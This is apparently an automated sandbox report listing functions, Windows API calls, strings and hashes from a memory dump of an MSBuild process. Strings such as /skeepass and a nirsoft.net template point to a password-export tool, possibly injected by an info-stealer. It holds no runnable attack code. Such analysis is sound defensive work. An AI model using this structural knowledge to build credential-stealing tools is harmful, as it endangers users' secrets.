Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
String ID: ---
API String ID: 3437578500-2854292027
Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9

Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041087D
memset.MSVCRT ref: 00410892
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
GetModuleHandleW.KERNEL32(00000000), ref: 00410951
LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
GetSysColor.USER32(0000000F), ref: 00410999
DeleteObject.GDI32(?), ref: 004109D0
DeleteObject.GDI32(?), ref: 004109D6
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 1010922700-0
Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29

Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE

GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
malloc.MSVCRT ref: 004186B7
free.MSVCRT ref: 004186C7
GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
free.MSVCRT ref: 004186E0
GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
malloc.MSVCRT ref: 004186FE
GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
free.MSVCRT ref: 00418716
free.MSVCRT ref: 0041872A
free.MSVCRT ref: 00418749

Strings

|A, xrefs: 00418680

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: free$FullNamePath$malloc$Version
String ID: |A
API String ID: 3356672799-1717621600
Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D

Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 004125FE
_wcsicmp.MSVCRT ref: 00412613

Strings

/scomma, xrefs: 00412662
/stab, xrefs: 00412638
/sverhtml, xrefs: 0041260E
/sxml, xrefs: 00412623
/stabular, xrefs: 0041264D
/shtml, xrefs: 004125F9
/skeepass, xrefs: 00412677

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _wcsicmp
String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
API String ID: 2081463915-1959339147
Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E

Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884

GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
FreeLibrary.KERNEL32(00000000), ref: 00413951

Strings

EnumProcessModules, xrefs: 004138F8
GetModuleBaseNameW, xrefs: 004138E7
GetModuleInformation, xrefs: 0041392B
GetModuleFileNameExW, xrefs: 00413909
EnumProcesses, xrefs: 0041391A
psapi.dll, xrefs: 004138CF

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2012295524-70141382
Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E

Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9

Strings

kernel32.dll, xrefs: 00413847
CreateToolhelp32Snapshot, xrefs: 0041385F
Module32Next, xrefs: 00413881
Process32Next, xrefs: 004138A3
Module32First, xrefs: 00413870
Process32First, xrefs: 00413892

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D

Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004121FF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
ReleaseDC.USER32(00000000,00000000), ref: 0041221F
SetBkMode.GDI32(?,00000001), ref: 00412232
SetTextColor.GDI32(?,00FF0000), ref: 00412240
SelectObject.GDI32(?,?), ref: 00412251
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
SelectObject.GDI32(00000014,00000005), ref: 00412291

Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F

GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
LoadCursorW.USER32(00000000,00000067), ref: 004122B5
SetCursor.USER32(00000000), ref: 004122BC
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
memcpy.MSVCRT(?,?,00002008), ref: 0041234D

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
String ID:
API String ID: 1700100422-0
Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59

Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 004111E0
GetWindowRect.USER32(?,?), ref: 004111F6
GetWindowRect.USER32(?,?), ref: 0041120C
GetDlgItem.USER32(00000000,0000040D), ref: 00411246
GetWindowRect.USER32(00000000), ref: 0041124D
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
BeginDeferWindowPos.USER32(00000004), ref: 00411281
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
EndDeferWindowPos.USER32(?), ref: 0041130B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14

Function 0040C084 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 110stringfileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4

Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A

GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4

Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024

memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
strchr.MSVCRT ref: 0040C140
strchr.MSVCRT ref: 0040C151
_strlwr.MSVCRT ref: 0040C15F
memset.MSVCRT ref: 0040C17A
CloseHandle.KERNEL32(00000000), ref: 0040C1C7

Strings

4, xrefs: 0040C0C8
h, xrefs: 0040C12C

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
String ID: 4$h
API String ID: 4066021378-1856150674
Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9

Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041464F
memset.MSVCRT ref: 00414664
_snwprintf.MSVCRT ref: 0041467E
_snwprintf.MSVCRT ref: 0041469D
memset.MSVCRT ref: 004146CF
memset.MSVCRT ref: 004146E4
memset.MSVCRT ref: 004146F9
_snwprintf.MSVCRT ref: 00414713
_snwprintf.MSVCRT ref: 00414730

Strings

%%0.%df, xrefs: 00414671, 00414706

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_snwprintf
String ID: %%0.%df
API String ID: 3473751417-763548558
Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9

Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
KillTimer.USER32(?,00000041), ref: 004060D7
KillTimer.USER32(?,00000041), ref: 004060E8
GetTickCount.KERNEL32 ref: 0040610B
GetParent.USER32(?), ref: 00406136
SendMessageW.USER32(00000000), ref: 0040613D
BeginDeferWindowPos.USER32(00000004), ref: 0040614B
EndDeferWindowPos.USER32(00000000), ref: 0040619B
InvalidateRect.USER32(?,?,00000001), ref: 004061A7

Strings

A, xrefs: 004060F3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58

Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

LoadMenuW.USER32(?,?), ref: 0040D97F

Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830

DestroyMenu.USER32(00000000), ref: 0040D99D
CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
GetDesktopWindow.USER32 ref: 0040D9FD
CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
memset.MSVCRT ref: 0040DA23
GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
DestroyWindow.USER32(00000005), ref: 0040DA70

Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB

Strings

caption, xrefs: 0040DA51

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
String ID: caption
API String ID: 973020956-4135340389
Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59

Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410A98
memset.MSVCRT ref: 00410AAD
memset.MSVCRT ref: 00410AC2
_snwprintf.MSVCRT ref: 00410AEA
wcscpy.MSVCRT ref: 00410B06
_snwprintf.MSVCRT ref: 00410B49

Strings

<table dir="rtl"><tr><td>, xrefs: 00410B00
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
<meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$_snwprintf$wcscpy
String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
API String ID: 1283228442-2366825230
Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9

Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00413972
wcscpy.MSVCRT ref: 00413982

Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B

wcscpy.MSVCRT ref: 004139D1
wcscat.MSVCRT ref: 004139DC
memset.MSVCRT ref: 004139B8

Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB

memset.MSVCRT ref: 00413A00
memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
wcscat.MSVCRT ref: 00413A27

Strings

\systemroot, xrefs: 0041398F

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
String ID: \systemroot
API String ID: 4173585201-1821301763
Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E

Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON

Download Yara Rule

APIs

wcscpy.MSVCRT ref: 00414C23

Strings

Common Programs, xrefs: 00414C1D
Common Startup, xrefs: 00414C16
AppData, xrefs: 00414C08
Common Start Menu, xrefs: 00414BF0
Desktop, xrefs: 00414BCD
Start Menu, xrefs: 00414BD4
Common Desktop, xrefs: 00414C0F
Startup, xrefs: 00414BDB
Favorites, xrefs: 00414BE2
Programs, xrefs: 00414BE9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscpy
String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
API String ID: 1284135714-318151290
Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F

Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040D2C1
memset.MSVCRT ref: 0040D2E5
GetMenuItemInfoW.USER32 ref: 0040D320
memset.MSVCRT ref: 0040D34F
wcschr.MSVCRT ref: 0040D35B
wcscat.MSVCRT ref: 0040D3B6
ModifyMenuW.USER32(?,?,00000400,?,?), ref: 0040D3D2

Strings

0, xrefs: 0040D300
6, xrefs: 0040D30B

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
String ID: 0$6
API String ID: 4066108131-3849865405
Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B

Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004082EF

Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF

memset.MSVCRT ref: 00408362
memset.MSVCRT ref: 00408377

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$ByteCharMultiWide
String ID:
API String ID: 290601579-0
Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59

Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON

Download Yara Rule

APIs

memchr.MSVCRT ref: 00444EBF
memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
memset.MSVCRT ref: 0044505E

Strings

PD, xrefs: 0044500C, 00445018, 0044500F, 0044501B
PD, xrefs: 00444EB1, 00445078, 00444EE7, 00444F31, 00444EB9

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memcpy$memchrmemset
String ID: PD$PD
API String ID: 1581201632-2312785699
Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4

Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000011), ref: 00409F5B
GetSystemMetrics.USER32(00000010), ref: 00409F61
GetDC.USER32(00000000), ref: 00409F6E
GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
GetWindowRect.USER32(?,?), ref: 00409FA0
GetParent.USER32(?), ref: 00409FA5
GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
String ID:
API String ID: 2163313125-0
Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
